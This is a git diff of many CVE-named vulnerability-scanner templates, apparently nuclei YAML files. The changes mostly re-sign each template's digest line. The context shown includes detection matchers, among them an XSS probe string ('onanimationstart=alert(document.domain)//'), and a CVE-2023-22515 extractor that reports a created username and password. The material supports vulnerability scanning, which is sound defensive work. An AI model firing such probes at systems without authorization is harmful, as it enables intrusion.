--- a/http/cves/2023/CVE-2023-1780.yaml +++ b/http/cves/2023/CVE-2023-1780.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "re not allowed to view")' - 'contains(body_2, "")' condition: and - -# digest: 4a0a00473045022100d2497498441408822f64d921fdf642d56920d1d560a24f5a2fd52aafd6ef799b0220081e3cbe1af68733fbe015eab56f80253e541aa1de28bf5e3c260c3d1bb21431:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206b28204d0518be199e9aa3732056ca5bab111f5e14efff4c4e78cf286b59bc610221009130b7c3513a56ae3c859df4bd73bb3c845f469bc219140bd463e17b5ef477f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 062c11d8ea..46f3308b2a 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -49,5 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Ninja Forms")' condition: and - -# digest: 4a0a0047304502201dbf1142b866e4d9111949b2669a3381763f864633af5b6fabf8bd84cf47fe8f022100e4c658916ce05029b3a12adddd349d03b129209fbd2e3b618915e944e264f7f5:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022012e85bdfc3f572ccc6f34e1f72724ededc61a2bac0641fafc1353391db1fb6a502200895e0c61860700f28687b7ebf5e9f078ff0e47c97d8a3fd6e6b989862dd0dcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml index f03d0850db..fa9f62b9bc 100644 --- a/http/cves/2023/CVE-2023-1880.yaml +++ b/http/cves/2023/CVE-2023-1880.yaml @@ -39,5 +39,4 @@ http: - 'contains(body, "phpmyfaq") && contains(body, "")' - 'contains(content_type, "text/html")' condition: and - -# digest: 4a0a004730450220474d08f15f9dde832085f458eaa84d9429572f8b03569a5ac02d011ae7f1d21c022100ca616644cf79b2c751e85ab12cc2287ae4eaa2b9a8e324758b932c77a2cedd75:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205d6528799d2fdadd3d09448fb767504ab2f3ae965be41d73ea700795bb2e9d75022100b7407beba97a3a43116e91caef819f7db988483ac2de0f3f3e7f231fa7ccb720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index 8558932480..cf5ab37a4d 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "tablesome")' condition: and - -# digest: 4b0a00483046022100a2df2f4aa89ea5226c3105a8cbf21c36ed91005393efd51fbaef977ca59bd5ee022100e01c3689f2cd0b0acdbcc2cd4cdc6ee5be54bb5d02fc895ce3d1fa8d80552c2a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ac1825c38af32dec819744c48d98f92f550a111b7b45cffa0dd15f0c19398f98022100b015250da36b9af22a2218c0c903244df136536782aac7b19f7612ff755c1434:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index 6a59ab762f..5332e40a05 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -78,5 +78,4 @@ http: part: body_3 words: - "{{html_comment}}" - -# digest: 490a0046304402200de8fd3bf4accc4b48e1fe4377ba0dd6b551e465d80036702269bae279bab32f02203a75329444dde65aed7b1f9b818836866ca51158f51ecce2d79fe882e0ca202a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205eb645f0275cec95d18a203a694b60177422fcbb8951f09495146790c5275eb1022100eaf5093d64568d59d370420b35859e1b4060fc10d8b975f19d7aea55b9e42350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index a3e8183d27..33c2518ec2 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -62,5 +62,4 @@ http: group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' - -# digest: 490a00463044022017abae3009c22c1e84e3f2f09caac196489f34f1770616c8b91aa33f6d846ae10220593e81d557fc81ad71e38f8abba0d591494ed5939d0cf65428666891ef16bded:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fe9dddc694ceeb3c0f9340ca367428eafaa5f049f5959190ec5e29ce621c54f4022020d03fc18f35b2b218df65a5608e53fcdc9f8d18e1fb94ee9bb6383d2bbb29cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml index ef0b7e58b9..c83a10f0cb 100644 --- a/http/cves/2023/CVE-2023-20198.yaml +++ b/http/cves/2023/CVE-2023-20198.yaml @@ -61,5 +61,4 @@ http: group: 1 regex: - \n(.*)\[ - -# digest: 4a0a004730450221009b40a4249142eed7d5189033384a64024e155f76f7ca4e22d7ed4e20ea8f578702201f8018ac440528d752437de795fd4e715fa868274f6b94acea7477db80fa0c57:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206512f1b676d1708171ee9ccf7e0189345f61b1d372f2183cdc4ca94f4b668776022100d05fa2ba553d658336000d3b73281b6e5343b42625e0f552a39ee5a5450249eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 49a9db98b6..c476c6e253 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -48,5 +48,4 @@ http: - contains(body_2, "onanimationstart=alert(document.domain)//") - contains(body_2, "Custom 404 Pro") condition: and - -# digest: 4b0a00483046022100cd7dfbd91da4662afb0630d41edda48e1dba3cb2813c216afbb2936b3dcfdf3c0221008d16764bcf7fd29ef7320f30dcd73d2bc4adedd17ca0d08faa1b30f383551c01:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d15cc0d593a6716f39b072b563ae2cb6fa693fa100d1fcc5e1320d4832e95c360220461b644061854a3fb2016effe864658085d1edf36e3e758693965597adca4dc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index a7109fe626..641a95c1c6 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -62,5 +62,4 @@ http: internal: true kval: - "X_CSRF_Token" - -# digest: 490a00463044022022f0ad2b91df834b6fa4b7201fe11bf8a4bdedc84018bf4d9e9db3f1ee72c44b0220352aae277cb8bc44fb45d91f52c3eeea11390f2c17e6ecbf33fb3bde9b0180ad:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100efe88f762bce3f73b340da8ff72edc9bca5c68a7ef7b85bebbe3374d52c4d55b022008533c01fd2deaa47c1b9dc19a355898b4fce9550fbd490fdc37a355c5d86e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 7e811d585f..7381929c94 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -64,5 +64,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008077cb5622c3c423bc607064143ab5a761fb5ab8f177fb3717caa936195ec00c0221009ef05dd3ab8bc5b15b0476172eac8e80e82c1e708d0ec54995fc0e89efa98ade:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206505c3f9865cfd585e700492483ecaa07e8befedc61e2e8cf82f708aec94642602210095afef5f0674381e55f534c3aada4980d40188b03229e07d20e722a3b5ec0a64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 138daae2db..e7b59df0af 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -65,5 +65,4 @@ http: - 'csrfToken":"([a-z0-9A-Z/+=]+)"' internal: true part: body - -# digest: 490a0046304402206dbf0c2a5c8cf4f9f55095bc9351d0757070fced470230d472933f4518513150022020f22cade5ca4a245a398514fc622bdc6b72f8eac927f1f33c56c02783e87121:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dc0d885379e24550c4c388a0c87774e9979b03019aa56de1e210e966b1be0ce50221009705966b40310049b0180913efe88c8ce5cca27fe5fa54c815b74a0ef0fb6e0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index e2812f7abb..4ccacb59f7 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -86,5 +86,4 @@ http: - csrfToken":"([a-z0-9A-Z/+=]+)" internal: true part: body - -# digest: 4a0a00473045022100f1399a3f1fe247077d4d509c5d310b0bcbefc284aec1d9b0c32f2b4c62d92e95022065dff549c694a3d9c65d2b53a58483d7932dc146b1ee401464164acd0bcab363:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d2f7b2ac9f8389e82ca46502cf301c9672e2e31fe572853294875aa7a1e00b220221008aad5244e64907a700d763d96ac469f3739ceb5ef4f07655b3630063de136b7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index a55aca1255..13ed7ce5da 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -48,5 +48,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Image optimizer")' condition: and - -# digest: 4b0a00483046022100b053445902d00efddde99ff5fe3c24904c419c4a4ecea926ca2fbdaddf3c4a52022100ce9e1b9ae1b4c13f8fc4eeef245761c2230991716ef5afb362b22e72476e2f82:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200c39037accfcae169f7ab89f12159da63de94f2dd22bcca5755b454b3b63696e0220550d86ce281928ca76b719d21a53614be5e679a49092b38dad67e85a3f026bd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 5382f1b987..11e5e5e847 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -42,5 +42,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "Supplier Name")' condition: and - -# digest: 4a0a0047304502202cf3720ffa167fa8221f3d6d6c0a5a6642d8fe4f2a2a242878b5cdb0fef9679b02210082e412b31d8af5a61f5ccf7e52724760e2aab7cbd6abb6117e917734cadddf89:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008c99be322f88e76dd58ca3b7b46d1c3cba0c974953b773fc472591be7c4be46602203fdf47bfdca36ddf2965c55f38d1ac185958a2b033ea746d538ee8daa41f6a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index a0250b9b44..bbdfd6cba7 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "page_aajoda-testimonials")' condition: and - -# digest: 4a0a00473045022100b76250aa032de9f62a0ccc0478ed67c45259fac05c7bebeef5d73ceb1780617a0220260f8b26190cd7f47bedc1b59948cab137161aa57c7ad1f76c52aaa2f1c0dc44:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202b8d077cf1f7630d311082ecbe99d2f8de7642cf4cd94911937242084e8de98d022000a204601d56bebe3cd4d11de37314c8a2dd51cc2d2f88847907ac82884f6341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index 82f3c87128..2491453745 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -70,5 +70,4 @@ http: regex: - 'name="nonce_wdseo" value="([a-z0-9]+)" \/>' internal: true - -# digest: 490a0046304402203fe8e2139990a80a430fa97482ffa5b8b59c2f7c5aa12785ad9b5f34718b1cda02204a95f9c239671de4406361cfdda505584b1a549c69c3704483efd59d6ba583a2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220572ef657b7c9136c90016a3314c65e03d6c4c6f9de6bf927d696a87d5b0d311a022100f75d4041f79548a09a036c8252048539afcef4e7e34221633b315cb7bbddf8cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml index a6abd4b544..ca761f6807 100644 --- a/http/cves/2023/CVE-2023-22432.yaml +++ b/http/cves/2023/CVE-2023-22432.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 303 - -# digest: 4a0a00473045022100a92a4d0c93e6593afb1e6839425d350657c03e4aabdc1cb143edcdfbc71511b3022027cda638c2171123e8c200db1e7ce8c1a1cf31975df3708a2498841058bd81cc:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022009651fce1da5f353ad20113a49f249d15913385b8b07d315881ea68a615f9da7022006c02f9c91d926ec6a8b98788a404e37b6e326b30cf142e48f6382a775e97cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index 72a553273a..bf85571879 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -76,5 +76,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100cebb790f080e2d2b4f7411aa0ec5c3565914c947968a655fab6f2d9c87488497022100f5092b5cadeeb36e53eb0a0ba757cc5d2d57c56236470f8a245b1e2815c29b6c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201d154010b6c0b4206d66a35e914c1fab0791f3ebc399da12f2985d1933b381b6022074467bd939a181472cd0edbe5be81626fea22213c0209928377e74f303d1ad78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index a289445471..9292c85018 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100943d3f7a0b50a7bb0b97998f140b36a8ba60a2adfb4f7da994b977661e601f00022100a0f77decbced20a86aa838be123fd56fcf205b79999216087e798cbe93deb43f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022067e90b342c3d6ac35886285630d92892d25b455453ea43e4229c2deda05d85c2022100b71ac1bf52f8bcd0f04bf5215c2cd1f81875d25109a0c9092d0221f66bb884f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index ba085e0333..c834916aff 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205bd9c7b6b96de9804847653b187c4241a72f362a7b65e3bef86acb32045db7b6022100a8de1c588c10897241ed05408e927998f5eeae5b3479e5fc72f6963fb9f1cf0e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e98b580198d3e2772eb35e6c805306a56e94dd1ed04d2a0e63004aaa0218158e02207468b6efc224d49fb7ec668fca7cda9b3ecdb42dfaf1f04a72b7474d04cb704f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index d2b9162f35..f1c24fce0c 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -80,5 +80,4 @@ http: dsl: - '"USER: "+ username' - '"PASS: "+ password' - -# digest: 4a0a004730450220718a79951b923442e614ede7b70855432575774bdfe1f0ca4f1a5551934141ae02210094d8fef3fa89a0fe6bfa18e9b8fa10a1907951e92059db792481328a3631c86f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dd52c946be0da90a7da4e758cf1b1e5ddedb96c282ce56b21b1acef0e6cc3354022048eedf1997aa8835e3045f8ba66d6867db10e28e203e3dab9a1aff73eb6e08c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index 09e6fcb06f..355f70190f 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -55,5 +55,4 @@ http: - "status_code == 200" - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')" condition: and - -# digest: 490a00463044022017ac81b9e9803195ee8e14168360734959becf13b2890ae2efdeeba3c96097fe02200149d740d0191d0ee440b9756daae69a1a3c1dd7bafbaff1d3eab9e648885f2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9ee6b1bed1fe6ed05f3cf780e6d0b6a150b42ce384c484fe64a60a00326f34802201bab199181f4f5094b07cabcdc7b962d4d0cc419571e72d1448df4d4c398933e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index db42ae3194..fc78fac54b 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -69,5 +69,4 @@ http: regex: - '"sessionid": "([a-z0-9]+)"' internal: true - -# digest: 4b0a00483046022100be49af032bed3817a99d4e2e2a80f5c108d4894ef28f03e4027a9041c7dcdf8b022100e31686b3aa5b5eb1621f084022fa3fbc295c0cbd5f16108f8c619750da52ee4e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009febd96930e9cfbf6d93297bf73e191e1d3bba4faa3f7c1582d2662746faa4f3022100d798aca31573d9209ee7577a26eb3c6a0ee52552435d24d954339fc020c66f9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index 1f8c74bee6..5cdbe0cf0c 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Tiempo")' condition: and - -# digest: 490a0046304402200903bc96d5d25057483b5047a9aa560ee8b870b32977b509967c0874fd1aaa5102200bc0827cb76fd505fee517549d76b00575a2ed818e37d354c30284c3f3e58596:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220638dc49ad55a360e3ee9cde303349f8b53f56170307b63404822c5b77706db18022040393031f66757aa23bf653b70057f2e0e99d49fb23296d6635472ee8c464f9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 22797bbd0a..c4ba9e84f4 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009c3b756d6a4a0b49219582fbfb34785975f670b102709fae4273f521577f7c380220593292c42302188b0f21020b7f2936c87a38c92e8a9edeb024ab10beff7e519c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dedd4e5592f954cb1864c306e92d791eaaefc7590b87eceb853409b8947496ea0221008ad43e44096e490ea59b32becf3ada158d9d895a500f72f6fedee373809cf70a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 2c4c2b0d5f..5372445ee6 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b7d1bd9531d3a8b856f2be64ba7853a5d5021f7559029a5a147475af885bd59d022100fd8604a400ac91652264ae266c3189d378136cf5a2d447adb5b803d5559b6f61:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022004fd595db54648a560ca10a4bc873edd280d8aef22de9d457ee4cf029c245a7c022100d695e8a0ca55dfcf469697b8b2fae8b1867703e538c3d5f64d5988f050570f14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index f23ff65ea7..cf6335b127 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bfbeb538d2a4b531f1c94f56721fef77acbfbb698ac7d165e4d536446938023302202f3896c4561fdd9a5b0d05aaa63fff9a308cba4bef6915b44fa3c708da54a9e5:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207275c09906a5b765dc863c76b28e9882b11d86a441aaa3ba5d2113c164bd5788022040f1e48d3f8c5e2d371de076fd0cbe0c7dc33b548c8536b07778948662d2f903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index cae71f00e4..d9ba5ccc13 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -46,5 +46,4 @@ http: - status_code_1 != 403 # Wordfence - contains(body_2, "pmpro_updates") condition: and - -# digest: 4b0a00483046022100bd131b9cac78b7a17479d88be6253767fc44bad097a817fbc5d2562cfa0f53e10221009e4744295028c9e465bfb52b313a083a612d63b13a945da1652813aaeb45864d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200e53b6bb5868b6965f3f9a23059da35709feee4234ccd22b940b1dd297b1fbd2022100ce1b33d08870a6e257da1339984fb3ba90b845b4a124bcbcc212480d4212ac8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index 67490e2cc9..05ad3b8b94 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -40,5 +40,4 @@ http: - 'contains(body, "")' - 'contains(body, "qem_calendar")' condition: and - -# digest: 4a0a00473045022030555a38658bdef9bef482aeeb91c22f0018cfe013c513b0160b260e2443c12d022100f889486b6f6b125b4b81afac83e7aaafa8873f0bed44b1616fecf5299e77a07a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f037e35ed0c6666ef96252872c8a33d6ec27c3cf66d7692230bce6a8c401dd2d022100ecf4f2d0db34931444fa0355488c80da406d990b3ded728f22ca4c651dba7835:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index 42b5f2f8a5..2dd36c23e4 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202edbfe5f43916d6457e267c527f8c60e1f81e2fa28840a06c30294d6217716a50220706f9b20fc868d5606223fc49168b51d88ec89b5a9903bed47bddfef5ca965ad:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022022dffd0ceb8275f1b0b8dcb39c67041aed42d63537fbe2332cd204cdcfb3832d022100f4200114757565befadd9f5f708fbd931a1726021819dd8a39210706fbc4d442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 40047b5c56..f699d0b10c 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -67,5 +67,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body - -# digest: 4a0a0047304502207aa2409746f75654caf72b39af70276b776e55fce87e166372bb08c06e27381d022100f4704875f229b5926bc324ee4763449077726fd2bc0c43214c1db6f5c104e8ce:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202c14f59c09187b23e0b9bb2cd0f6b6a7001750f0956cbac93fd2acf7075d1ac3022100f4d257b1d8d901ae727893e0ff42f9c2a1d5f6f4b6f9f09fb43bf1ae1a86b990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index cb54325812..7e22671d6a 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220300f397d05ff3348f39d5e80ac645730ba52b705f597d96a977bf4a33019685202210090c7a12ee7ed0f51748a4a21fc6558bc0ce17654e550d8e2f90ad4e47ae2cdca:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210081d9e828d61a6662b0f50ff371cac06fb77f70477b39dca711c39806b19dd92d02205e3663fcad883b79c387b2ff749ac612c22c5fadcd496a60752104d78bfe196a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index abd99b699c..16cfa59a8b 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 303 - -# digest: 490a00463044022064c9d1e34902072ee97b79053d5cac7f62891e9740851d58affec37d20f8ee43022070c74f0600620e611ea99b0ba62ca1e02c971bcd1e74834da71a653c8e3f5c5b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ede0b98ac3b33d779a67254cc170a014378e605049538333bf2c61f229353799022065a88b9f65379dadf7f1ffa1031ff42d6fdfb6561e214347edd141903f0ab61f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index bd05a7f064..57b3a78444 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 404 - -# digest: 4b0a00483046022100ce6c909c51c61bb8192a2779b1af52913ae5572c91d27d84dde86cb7e197d16f022100bfe6b16e229172af50fff877b172052ff9513966befe93460e4bde4a509f8fe4:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207b6abc0f99ec621f4c6792847446a51bd3c94bbf00b5f02bf9a4b87ceea0e26f02204b8f76451a84612177501412ada37934f360a413190d0791b45ada10668ae78f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index d5b32533a2..21a800e085 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c7225de6859a48aa0fd94d0eaba3baa910561953e3dedc5e8ab3c086fad67949022100fbed77db02c34c3d9cf6f338b03078715fe66476cd1c8762cf3562f022b4ceef:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fdfb3c55d6004e91932019be7d68be686b786ae1b3fda34e6fd2a9407e7df14f022007f9051faeb22e7e0d7027a0b68f0b70dc52d02202c33369875730e25127dfef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 6277dc3bd5..bb56b2a189 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f59f9acc22461437f8bd020eaa7dea6a1f114f3e321b9d1324e1845d47ead560022100a5ca428d3a8804567bbbaccefff6ea82eefead5b3ca4c40fa28bec3aabde245d:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203e3c7a19064d425726cdd9abe2b5dabf5c31f84dd649e0d798dd929eab8fbb4e0220021212c17e97f66e1eb3ab3d9c5bd1933684990719b571398dfec01779d25959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 82a11f6449..63dcbdd6f1 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 302 - -# digest: 